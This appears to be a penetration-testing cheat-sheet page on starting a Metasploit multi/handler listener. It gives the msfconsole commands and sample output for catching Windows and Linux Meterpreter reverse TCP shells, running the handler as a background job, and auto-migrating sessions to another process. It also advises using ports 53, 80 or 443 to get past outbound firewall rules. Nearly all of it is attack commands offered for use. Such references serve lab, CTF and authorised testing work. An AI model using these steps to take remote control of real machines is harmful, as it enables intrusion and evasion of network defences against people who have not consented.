TLDRBins TLDRBins / Metasploit Listener

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Start a Metasploit Listener

msfconsole -q

Sample Output:
$ msfconsole -q
msf6 >

use exploit/multi/handler

Sample Output:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp

# Windows x64
set payload windows/x64/meterpreter/reverse_tcp

Sample Output:
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

# Linux amd64
set payload linux/x64/meterpreter/reverse_tcp

Sample Output:
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp

set lhost <LOCAL_IP>

Sample Output:
msf6 exploit(multi/handler) > set lhost 10.10.14.31
lhost => 10.10.14.31

set lport <LOCAL_PORT>

Sample Output:
msf6 exploit(multi/handler) > set lport 1337
lport => 1337

# Useful for multiple connections
set exitonsession false

Sample Output:
msf6 exploit(multi/handler) > set exitonsession false
exitonsession => false

run -j

Sample Output:
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Started reverse TCP handler on 10.10.14.4:1337     <----- Press Enter

Note: Try to use common ports such as 53, 80, 443 to bypass firewall outbound rules

If the shell die immediately, we can try to migrate it to another process

# Create a automigrate.rc script
run post/windows/manage/migrate

Sample Output:
$ cat automigrate.rc 
run post/windows/manage/migrate


msfconsole -q

Sample Output:
$ msfconsole -q
msf6 >

use exploit/multi/handler

Sample Output:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp

set payload windows/meterpreter/reverse_tcp

Sample Output:
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

set lhost <LOCAL_IP>

Sample Output:
msf6 exploit(multi/handler) > set lhost 10.10.14.31
lhost => 10.10.14.31

set lport <LOCAL_PORT>

Sample Output:
msf6 exploit(multi/handler) > set lport 1337
lport => 1337

set AutoRunScript multi_console_command -r automigrate.rc

Sample Output:
msf6 exploit(multi/handler) > set AutoRunScript multi_console_command -r automigrate.rc
AutoRunScript => multi_console_command -r automigrate.rc

run

Sample Output:
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.31:1337